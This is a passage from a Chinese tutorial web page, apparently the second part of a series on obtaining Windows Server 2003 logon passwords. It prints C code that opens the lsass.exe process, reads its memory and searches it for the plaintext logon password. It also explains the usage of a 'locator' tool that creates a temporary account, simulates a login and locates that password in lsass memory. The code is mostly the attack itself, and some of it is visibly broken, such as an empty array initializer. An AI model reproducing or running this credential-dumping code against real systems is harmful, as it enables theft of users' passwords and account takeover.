如何在Windows 2003中得到登陆密码 (2)

时间:2008-03-14 02:11:57  来源:网上收集  作者|记者:  浏览:631  大小:【】【】【
天府教程网导读:如何在Windows 2003中得到登陆密码
e Password
  // Return Type: BOOLEAN
  // Parameters:
  // In: DWORD PID -> The Lsass.exe's PID
  //------------------------------------------------------------------------------------
  BOOL FindPassword(DWORD PID)
  {
  HANDLE hProcess = NULL;
  char Buffer[5 * 1024] = ;
  DWORD ByteGet = 0;
  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
  if (hProcess == NULL)
  {
  printf("Fail To Open Process\n");
  return FALSE;
  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
  {
  printf("Fail To Read Memory\n");
  CloseHandle(hProcess);
  return FALSE;
  }

  CloseHandle(hProcess);

  Found = Search(Buffer,ByteGet); // Search The Password
  if (Found >= 0) // We May Find The Password
  {
  if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
  {
  printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
  }
  }
  else
  {
  printf("Fail To Find The Password\n");
  }
  return TRUE;
  }
  // End FindPassword

  //------------------------------------------------------------------------------------
  // Purpose: Check If The Box Is Windows 2003
  // Return Type: BOOLEAN
  // Parameters: None
  //------------------------------------------------------------------------------------
  BOOL Is2003()
  {
  OSVERSIONINFOEX osvi;
  BOOL b0sVersionInfoEx;
  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

  if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
  {
  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
  }
  return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
  }
  // End Is2003()
  // End Of File

  附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

  用法:

  1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

  2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。

[1] [2]

标签(Tags):如何在Windows 2003中得到登陆密码
引用地址:

相关文章

    站长推荐

    热点文章

    推荐文章

    返回天府教程网首页